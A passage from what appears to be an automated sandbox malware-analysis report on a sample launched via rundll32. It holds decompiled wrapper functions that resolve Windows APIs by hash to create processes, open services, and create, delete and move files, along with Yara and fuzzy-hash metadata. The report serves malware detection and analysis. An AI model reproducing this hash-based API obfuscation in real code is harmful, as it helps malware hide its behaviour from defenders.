                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00229772
                                          0x00229773
                                          0x00229778
                                          0x0022977a
                                          0x0022977b
                                          0x0022977e
                                          0x0022977f
                                          0x00229782
                                          0x00229785
                                          0x00229788
                                          0x00229789
                                          0x0022978c
                                          0x0022978f
                                          0x00229790
                                          0x00229791
                                          0x00229794
                                          0x00229797
                                          0x0022979a
                                          0x0022979d
                                          0x002297a0
                                          0x002297a3
                                          0x002297a6
                                          0x002297a7
                                          0x002297a8
                                          0x002297ad
                                          0x002297b7
                                          0x002297c3
                                          0x002297ca
                                          0x002297d1
                                          0x002297d8
                                          0x002297df
                                          0x002297e3
                                          0x002297fc
                                          0x00229816
                                          0x0022981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0021b569
                                          0x0021b56a
                                          0x0021b56d
                                          0x0021b572
                                          0x0021b574
                                          0x0021b577
                                          0x0021b57a
                                          0x0021b57d
                                          0x0021b580
                                          0x0021b583
                                          0x0021b586
                                          0x0021b587
                                          0x0021b58a
                                          0x0021b58d
                                          0x0021b590
                                          0x0021b593
                                          0x0021b594
                                          0x0021b595
                                          0x0021b59a
                                          0x0021b5a4
                                          0x0021b5b8
                                          0x0021b5c0
                                          0x0021b5c4
                                          0x0021b5cb
                                          0x0021b5d2
                                          0x0021b5d9
                                          0x0021b5e6
                                          0x0021b5fd
                                          0x0021b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00229821
                                          0x00229822
                                          0x00229825
                                          0x00229828
                                          0x0022982a
                                          0x0022982c
                                          0x0022982f
                                          0x00229832
                                          0x00229835
                                          0x00229836
                                          0x00229837
                                          0x0022983c
                                          0x00229855
                                          0x00229858
                                          0x0022985f
                                          0x00229866
                                          0x0022986d
                                          0x00229874
                                          0x0022987b
                                          0x0022988e
                                          0x0022989b
                                          0x002298a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00227bf7
                                          0x00227bf8
                                          0x00227bfa
                                          0x00227bfd
                                          0x00227bff
                                          0x00227c02
                                          0x00227c06
                                          0x00227c07
                                          0x00227c0f
                                          0x00227c1d
                                          0x00227c25
                                          0x00227c2d
                                          0x00227c31
                                          0x00227c38
                                          0x00227c3f
                                          0x00227c46
                                          0x00227c4a
                                          0x00227c5e
                                          0x00227c67
                                          0x00227c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0021f662
                                          0x0021f663
                                          0x0021f665
                                          0x0021f668
                                          0x0021f66a
                                          0x0021f66d
                                          0x0021f670
                                          0x0021f673
                                          0x0021f677
                                          0x0021f678
                                          0x0021f67d
                                          0x0021f687
                                          0x0021f693
                                          0x0021f69a
                                          0x0021f6a1
                                          0x0021f6a5
                                          0x0021f6a9
                                          0x0021f6b0
                                          0x0021f6c9
                                          0x0021f6d8
                                          0x0021f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0021b6f3
                                          0x0021b6f8
                                          0x0021b702
                                          0x0021b70b
                                          0x0021b712
                                          0x0021b719
                                          0x0021b720
                                          0x0021b727
                                          0x0021b72e
                                          0x0021b747
                                          0x0021b759
                                          0x0021b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0022aa3f
                                          0x0022aa40
                                          0x0022aa41
                                          0x0022aa44
                                          0x0022aa47
                                          0x0022aa4b
                                          0x0022aa4c
                                          0x0022aa51
                                          0x0022aa5b
                                          0x0022aa64
                                          0x0022aa68
                                          0x0022aa6f
                                          0x0022aa76
                                          0x0022aa8d
                                          0x0022aa90
                                          0x0022aa9d
                                          0x0022aaa8
                                          0x0022aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00215fb5
                                          0x00215fb6
                                          0x00215fb7
                                          0x00215fbb
                                          0x00215fbc
                                          0x00215fc1
                                          0x00215fcb
                                          0x00215fd7
                                          0x00215fde
                                          0x00215fe5
                                          0x00215ffc
                                          0x00215fff
                                          0x00216006
                                          0x0021600d
                                          0x0021601a
                                          0x00216025
                                          0x0021602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2252 Parent PID: 2952 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 001D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x001d295f
                                          0x001d2964
                                          0x001d2967
                                          0x001d296a
                                          0x001d296d
                                          0x001d296e
                                          0x001d296f
                                          0x001d2977
                                          0x001d2985
                                          0x001d298a
                                          0x001d2992
                                          0x001d299a
                                          0x001d29a2
                                          0x001d29a9
                                          0x001d29b0
                                          0x001d29b7
                                          0x001d29bb
                                          0x001d29cf
                                          0x001d29dc
                                          0x001d29e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x001dc6e1
                                          0x001dc6e6
                                          0x001dc6f0
                                          0x001dc6fc
                                          0x001dc703
                                          0x001dc706
                                          0x001dc70d
                                          0x001dc711
                                          0x001dc715
                                          0x001dc71c
                                          0x001dc723
                                          0x001dc72a
                                          0x001dc731
                                          0x001dc738
                                          0x001dc751
                                          0x001dc762
                                          0x001dc768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x001d1006
                                          0x001d1009
                                          0x001d100c
                                          0x001d1011
                                          0x001d1016
                                          0x001d101d
                                          0x001d1026
                                          0x001d102d
                                          0x001d1034
                                          0x001d103b
                                          0x001d1047
                                          0x001d104f
                                          0x001d1057
                                          0x001d105e
                                          0x001d1065
                                          0x001d106c
                                          0x001d1073
                                          0x001d1077
                                          0x001d108b
                                          0x001d1096
                                          0x001d109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 6c9247c1494e0430e7af192e2c9ebdad8a4dc037f7a170ec8d45a2d22dfa5ef9
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: F1015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 001D4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E001D4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
